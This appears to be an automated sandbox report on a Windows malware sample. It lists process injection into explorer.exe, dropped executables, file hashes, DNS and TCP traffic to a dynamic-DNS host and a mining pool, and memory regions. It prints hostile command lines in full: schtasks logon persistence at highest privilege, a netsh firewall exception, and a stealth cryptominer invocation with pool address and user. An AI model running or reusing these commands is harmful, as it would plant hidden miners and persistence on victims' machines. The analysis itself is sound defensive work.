PID 2424 wrote to memory of 4072 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Windows\explorer.exe
PID 2424 wrote to memory of 4072 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Windows\explorer.exe
PID 2424 wrote to memory of 4072 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Windows\explorer.exe
PID 3492 wrote to memory of 1000 N/A C:\Users\Admin\AppData\Local\Temp\server.exe C:\Windows\SysWOW64\netsh.exe
PID 3492 wrote to memory of 1000 N/A C:\Users\Admin\AppData\Local\Temp\server.exe C:\Windows\SysWOW64\netsh.exe
PID 3492 wrote to memory of 1000 N/A C:\Users\Admin\AppData\Local\Temp\server.exe C:\Windows\SysWOW64\netsh.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\6f8798f01a7ec11429f624dbc59b4a32.exe

"C:\Users\Admin\AppData\Local\Temp\6f8798f01a7ec11429f624dbc59b4a32.exe"

C:\Users\Admin\AppData\Local\Temp\lear.exe

"C:\Users\Admin\AppData\Local\Temp\lear.exe"

C:\Users\Admin\AppData\Local\Temp\svhost.exe

"C:\Users\Admin\AppData\Local\Temp\svhost.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\1_protected.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\1_protected.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\AppData\Local\Temp\services32.exe"' & exit

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\AppData\Local\Temp\services32.exe"'

C:\Users\Admin\AppData\Local\Temp\RarSFX0\2_protected.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\2_protected.exe"

C:\Users\Admin\AppData\Local\Temp\services32.exe

"C:\Users\Admin\AppData\Local\Temp\services32.exe"

C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\AppData\Local\Temp\services32.exe"'

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"'

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"' & exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\AppData\Local\Temp\services32.exe"' & exit

C:\Users\Admin\AppData\Local\Temp\server.exe

"C:\Users\Admin\AppData\Local\Temp\server.exe"

C:\Users\Admin\AppData\Local\Temp\services64.exe

"C:\Users\Admin\AppData\Local\Temp\services64.exe"

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"'

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"' & exit

C:\Windows\explorer.exe

C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=prohashing.com:3359 --user=vlas --pass=a=randomx --cpu-max-threads-hint=40 --cinit-idle-wait=1 --cinit-idle-cpu=80 --cinit-stealth

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE

C:\Windows\System32\sihclient.exe

C:\Windows\System32\sihclient.exe /cv kJYy6oQToUmTHYGhxZtTsw.0.2

Network

Country Destination Domain Proto
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 202.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 1.181.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 sanctam.net udp
US 8.8.8.8:53 github.com udp
DE 140.82.121.3:443 github.com tcp
US 8.8.8.8:53 3.121.82.140.in-addr.arpa udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
DE 140.82.121.3:443 github.com tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 104.21.10.32:3359 tcp
US 8.8.8.8:53 bishkek931.ddns.net udp
US 8.8.8.8:53 bishkek931.ddns.net udp
US 8.8.8.8:53 bishkek931.ddns.net udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
GB 88.221.134.18:80 tcp
US 8.8.8.8:53 18.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 bishkek931.ddns.net udp
US 104.21.10.32:3359 tcp
US 8.8.8.8:53 bishkek931.ddns.net udp
US 8.8.8.8:53 bishkek931.ddns.net udp
US 8.8.8.8:53 bishkek931.ddns.net udp
US 8.8.8.8:53 bishkek931.ddns.net udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 104.21.10.32:3359 tcp
US 8.8.8.8:53 bishkek931.ddns.net udp
US 8.8.8.8:53 bishkek931.ddns.net udp
US 8.8.8.8:53 bishkek931.ddns.net udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 bishkek931.ddns.net udp
US 104.21.10.32:3359 tcp
US 8.8.8.8:53 bishkek931.ddns.net udp
US 8.8.8.8:53 bishkek931.ddns.net udp
US 8.8.8.8:53 bishkek931.ddns.net udp
US 8.8.8.8:53 bishkek931.ddns.net udp
US 8.8.8.8:53 bishkek931.ddns.net udp
US 172.67.189.225:3359 tcp
US 8.8.8.8:53 bishkek931.ddns.net udp
US 8.8.8.8:53 bishkek931.ddns.net udp
US 8.8.8.8:53 bishkek931.ddns.net udp
US 8.8.8.8:53 bishkek931.ddns.net udp
US 172.67.189.225:3359 tcp
US 8.8.8.8:53 bishkek931.ddns.net udp
US 8.8.8.8:53 15.173.189.20.in-addr.arpa udp

Files

memory/3200-0-0x0000000000AA0000-0x0000000000DB8000-memory.dmp

memory/3200-3-0x000000001BA30000-0x000000001BA40000-memory.dmp

memory/3200-2-0x000000001BA30000-0x000000001BA40000-memory.dmp

memory/3200-1-0x00007FFE4BE60000-0x00007FFE4C921000-memory.dmp

memory/3200-4-0x000000001BA30000-0x000000001BA40000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\lear.exe

MD5 0bff36b53d94dbeba2ca37da0ee15631
SHA1 4536eb13dd54de6b25d0de95272efd65eb70234c
SHA256 841b1aac0d31d294a7ee3a77946947e24ef8eba639c67b9004337b0689f28ac9
SHA512 0fa04ec542b27d13fe9e45a7bca2094ad628c8e80a5466ec264fd85b54a56899dc23bd6898879af4919609b336e8b75965ba743326149959fdeec27a0fe4f668

C:\Users\Admin\AppData\Local\Temp\svhost.exe

MD5 696f2e0facba8c9bc7e2269986bada95
SHA1 aaa3ce178ba47c0e370c3ca40b99654cf61d99dd
SHA256 de781ab98b48f1d32a0eac30ab8e9f3d0de9d532db7720fd0a803f227abb039a
SHA512 afa581a6e90aac8b6dc99fa15bfcf078d83af623bee1d79ed9f7578160d6651fa80f2deaf3b43d9a5082442cb82b9e5fd2c3d18d51d5f7cd52182115511baaeb

C:\Users\Admin\AppData\Local\Temp\lear.exe

MD5 95f767c722a38a1cefe083d99422a58d
SHA1 16eb39ae6079acbc7a9bbe88eb3ebbe85ade9cf8
SHA256 157f6767a523fbbd1c304aa1b855c1e843b49d227cc4c7df702262b11c75bda1
SHA512 a56fb76657217691632f79295d85d845df35b45b0302727e2724413c508757bcb983ea6b87be5629368980929ae86035483c28c4c8266d545ecadfcc4d1a5944

memory/3200-71-0x00007FFE4BE60000-0x00007FFE4C921000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\lear.exe

MD5 19b6f0bec5362333d1d87f4679208d72
SHA1 a4f6bdec95a45bd30c874c2a44a3222b948f966f
SHA256 a0e550e73ffaba9fc8a24d91a14d17ed4402ac30dc90e5ac42625115d50cabdb
SHA512 18d3f8ec0269c06ee1f48ead949e852b726b7813cf5d4fa61497b0a01dae2f9b661f5ce5eb7122f11e346397f4fa92b2977ffe2542f92bb2e8d60f0772667b6f

memory/1956-73-0x0000000074600000-0x0000000074BB1000-memory.dmp

memory/1956-74-0x0000000074600000-0x0000000074BB1000-memory.dmp

memory/1956-75-0x0000000001660000-0x0000000001670000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX0\1_protected.exe

MD5 9ddac033ac79900f5ad182c557c328d1
SHA1 e7178202799f83f318a1083fb10910278ba1efe9
SHA256 316af643b17f7f6f9a74775791d5603a2eba9b35fa758dda2f4d3b884e3839bd
SHA512 eee3d87857d7bc6f45a88bf49aa05ec0fedd48f32ee7fae04f2e840a24e635b4340275093253cf1639194dc0277c5e0e9e5c06deb7178127bff6d1dcc5db53be

C:\Users\Admin\AppData\Local\Temp\RarSFX0\1_protected.exe

MD5 43d590f88270ff8963d47a4a5161cd2c
SHA1 2ba74ac4fec486373c0ebe94bc75223ab2600490
SHA256 db25ed27bfdfde3b88b4a7483e15bdecc587f694e8dc2c1ca91325e1d5b4453a
SHA512 00a156c09c6d7e5dc25f89aecd4051a3d555aec268d313d328ea12ebb30a30a7d2d80a152e8b06bd477fe9fd01ee16ecbef62edf249b03fc59f0fd809b9934a0

memory/1020-90-0x00007FF624DC0000-0x00007FF6253B4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX0\1_protected.exe

MD5 40640840746d6a6c57a2d75527df8991
SHA1 13deceda20b587158231fa7613b78a77172f86ce
SHA256 f05e99298ab69dd46226761dacb6933f03bbcb95f8bfb0238a578af15e187039
SHA512 2e06df6a763cbef37f0bdabe15cae69ad90d5e0614617f875f249837241b8838a0ea0dd1a2a04d1b5ef5c522167811ee542da57d3aa09b2e5a07c9c223c041f3

memory/1020-92-0x00007FFE69970000-0x00007FFE69980000-memory.dmp

memory/1020-93-0x00007FF624DC0000-0x00007FF6253B4000-memory.dmp

memory/1020-95-0x00007FF624DC0000-0x00007FF6253B4000-memory.dmp

memory/1020-94-0x00007FFE4B100000-0x00007FFE4BBC1000-memory.dmp

memory/1020-96-0x00000000037C0000-0x00000000037CA000-memory.dmp

memory/1020-98-0x0000000003C50000-0x0000000003C60000-memory.dmp

memory/1020-97-0x0000000003C30000-0x0000000003C42000-memory.dmp

memory/4648-112-0x00007FF6FEF40000-0x00007FF6FF534000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\services32.exe

MD5 25c8ed402887392f040d5df468f72c28
SHA1 d0ce1a4bc8146fd69b96253744160d684b5da285
SHA256 5419970b47d0b6e6550db7feaa099928b2f903f4fdffa10a0ef5ffbf92e61576
SHA512 865fc814f9314bec937773b0172a496b8c27e1fdbfc14418ae73d199eff4d89dad4d1d3615247b356b58bf440003f0df8bcce32b32f7032c0dd20cd93f4e17a4

C:\Users\Admin\AppData\Local\Temp\RarSFX0\2_protected.exe

MD5 611f87f2772d9497a398a841060635b9
SHA1 87f09e34188c36929a8711b007ffa985d31c7191
SHA256 1cfe9df671ad4323ec6713fb0838592e2de707e1dadd93be8fede2addf541a3e
SHA512 d2fd1ea8862690ee0458d8af38470547bb6bc38916a767f150ba4089de8c3776ebf9d0e4e5be35fb75c2af4e68528042cd975cf7541db881379394f07ca3e4b2

C:\Users\Admin\AppData\Local\Temp\RarSFX0\2_protected.exe

MD5 9c648eeade4c8b324585f38247f40740
SHA1 f5c348717d3a76a370048c5a5195a303f0daaa07
SHA256 46f961a91e90790ca245e819a60faf357aa8af518a05d7c22053032d67360f83
SHA512 3bcd1e06b8e4616d582bd1f0211baaf6fc7a3028815ddbb7bc3ec262d5918826139758c3a355b1a044e0b6070db1fe360718ed82a9dbf9dcc46dfb34850112b4

memory/4912-126-0x00007FF67BDE0000-0x00007FF67C3D6000-memory.dmp

memory/4648-129-0x00007FFE4B100000-0x00007FFE4BBC1000-memory.dmp

memory/4648-130-0x00007FFE69970000-0x00007FFE69980000-memory.dmp

memory/4912-134-0x00007FFE69970000-0x00007FFE69980000-memory.dmp

memory/4912-135-0x00007FF67BDE0000-0x00007FF67C3D6000-memory.dmp

memory/4912-136-0x00007FFE4B100000-0x00007FFE4BBC1000-memory.dmp

memory/1956-133-0x0000000074600000-0x0000000074BB1000-memory.dmp

memory/4912-132-0x00007FF67BDE0000-0x00007FF67C3D6000-memory.dmp

memory/4648-128-0x00007FF6FEF40000-0x00007FF6FF534000-memory.dmp

memory/4648-127-0x00007FF6FEF40000-0x00007FF6FF534000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX0\2_protected.exe

MD5 50075fb9b3b6faae5c0184b3e69a891a
SHA1 f0fd43ea6936473d6a39ee6edfb77c5365465ec5
SHA256 c64a0c0c1a706706a770e38716e14d340d469f26fbf00534545ef59c4a88ffa2
SHA512 6e67ba375a6af58d0c86750fb165130e06235fc5c895ae9bbcf4a8e6b08717af1fad74624ba38ae5f3bccd67453bc6cbe82dcfba018d63d3f0b10b570a844b31

memory/1020-114-0x00007FF624DC0000-0x00007FF6253B4000-memory.dmp

memory/1020-113-0x00007FFE4B100000-0x00007FFE4BBC1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\services32.exe

MD5 ce128f070c0ee7cbd879ca932f6635b1
SHA1 5cd7502bfaf0461b6c71f1e58639435ca9838eae
SHA256 f45f3f008a7903e2b96e0d3c216d0dad3705ffe7a5f5cba4c2014e9c9363b3e2
SHA512 d0c68081d090de4ed1526e98236ebfa3064d9d64b3c110f69a096448409e1522f60ddeac3eff575a831568862a3e3178016c47ab1eb6265fe73b8b7183a8349a

memory/4648-137-0x0000000004590000-0x00000000045A0000-memory.dmp

memory/3204-151-0x00000000003A0000-0x00000000003A6000-memory.dmp

memory/1956-152-0x0000000001660000-0x0000000001670000-memory.dmp

memory/4912-155-0x0000000003E80000-0x0000000003E90000-memory.dmp

memory/3204-156-0x000000001BE40000-0x000000001BE50000-memory.dmp

memory/3204-154-0x00007FFE4B100000-0x00007FFE4BBC1000-memory.dmp

memory/4912-153-0x0000000003410000-0x000000000341E000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe

MD5 7f13e2b226baf92c8c7aa34606a33043
SHA1 957594155513bcb9adf119fbd683d6222c97b6f7
SHA256 82daa75486edff63daa1eb62220e8aaeea23691151ba98f9f3b8b87f51428e3d
SHA512 a164fc7ecdd842fcedea61025fd8f9abe7c9efa06d08493be2413a052fa91e9c1818bbf006475b3f740174a0c7e6e474ee7f5fa2b703b4f164a8849d4dcc02a1

memory/3492-169-0x0000000001430000-0x0000000001440000-memory.dmp

memory/3492-168-0x0000000074600000-0x0000000074BB1000-memory.dmp

memory/1956-167-0x0000000074600000-0x0000000074BB1000-memory.dmp

memory/4648-173-0x00007FFE4B100000-0x00007FFE4BBC1000-memory.dmp

memory/4648-174-0x00007FF6FEF40000-0x00007FF6FF534000-memory.dmp

memory/2424-186-0x00007FF70E590000-0x00007FF70EB86000-memory.dmp

memory/4912-188-0x00007FF67BDE0000-0x00007FF67C3D6000-memory.dmp

memory/4912-190-0x00007FFE4B100000-0x00007FFE4BBC1000-memory.dmp

memory/2424-194-0x00007FFE4B100000-0x00007FFE4BBC1000-memory.dmp

memory/2424-193-0x00007FF70E590000-0x00007FF70EB86000-memory.dmp

memory/2424-192-0x00007FFE69970000-0x00007FFE69980000-memory.dmp

memory/2424-191-0x00007FF70E590000-0x00007FF70EB86000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\services64.exe

MD5 e1600c76646028abf588db4acbf5d6d8
SHA1 33968a07ed3ba13704f723cf42f06d289a0bfdea
SHA256 87c0c43b47a5a17ae3df59343e8f2c12c48c2b30ef2c92c0a4d63176353533d2
SHA512 64fe3c44c494eb5a1ba400a386d0426dedf2e6df86ae8a819354e7b57633940e693489e0ef8fea49c39d6ef060b8a32884a3dc3205fafc208e1bd19e91e3154f

C:\Users\Admin\AppData\Local\Temp\services64.exe

MD5 2bbec033125ea50257184b2656416fd4
SHA1 f6cfe41ea675edfd614c7d5809736540ebf5fff2
SHA256 56b86287dea61cc557b726bc56024096ad21eb5821782933f35e78688a2d5109
SHA512 a048b9c9056ed7a1851153ae15db7ee5ce76d66b9e3c358d9641d3470eccfc0ef65322be0b49bfb34424b3d9f60dd994cc056f13d67069caca1336d06ca53a00

memory/2424-195-0x000000001D250000-0x000000001D260000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

MD5 16379e3af6a104ba50f80465c44297b3
SHA1 23fa672955f7519aa8ab000977560fa952069052
SHA256 a37d2858b1c7aa02fc4ff57dd4c0f6822fa280c3fae16ca0d79d4df51db1ceae
SHA512 97a19c76e28214e5cff3bc0164edbb5f52f627a414a2e9008033b398549641d434aad8f97095399c994f7dfb372eb72bafbf706a31877cc2bb7dabb229d0db59

memory/4836-210-0x0000000000640000-0x0000000000646000-memory.dmp

memory/4836-211-0x00007FFE4B100000-0x00007FFE4BBC1000-memory.dmp

memory/4836-212-0x00000000032A0000-0x00000000032B0000-memory.dmp

memory/4072-216-0x0000000140000000-0x0000000140786000-memory.dmp

memory/2424-220-0x00007FF70E590000-0x00007FF70EB86000-memory.dmp

memory/2424-222-0x00007FFE4B100000-0x00007FFE4BBC1000-memory.dmp

memory/4072-221-0x0000000140000000-0x0000000140786000-memory.dmp

memory/4072-224-0x0000000140000000-0x0000000140786000-memory.dmp

memory/4072-225-0x0000000140000000-0x0000000140786000-memory.dmp

memory/4072-227-0x0000000140000000-0x0000000140786000-memory.dmp

memory/4072-226-0x0000000140000000-0x0000000140786000-memory.dmp

memory/4072-223-0x0000000140000000-0x0000000140786000-memory.dmp

memory/4072-219-0x0000000001F20000-0x0000000001F40000-memory.dmp

memory/4072-218-0x0000000140000000-0x0000000140786000-memory.dmp

memory/4072-214-0x0000000140000000-0x0000000140786000-memory.dmp

memory/3204-229-0x00007FFE4B100000-0x00007FFE4BBC1000-memory.dmp

memory/3204-230-0x000000001BE40000-0x000000001BE50000-memory.dmp

memory/3492-232-0x0000000001430000-0x0000000001440000-memory.dmp

memory/3492-231-0x0000000074600000-0x0000000074BB1000-memory.dmp

memory/4836-233-0x00007FFE4B100000-0x00007FFE4BBC1000-memory.dmp

memory/4836-234-0x00000000032A0000-0x00000000032B0000-memory.dmp

memory/4072-235-0x0000000140000000-0x0000000140786000-memory.dmp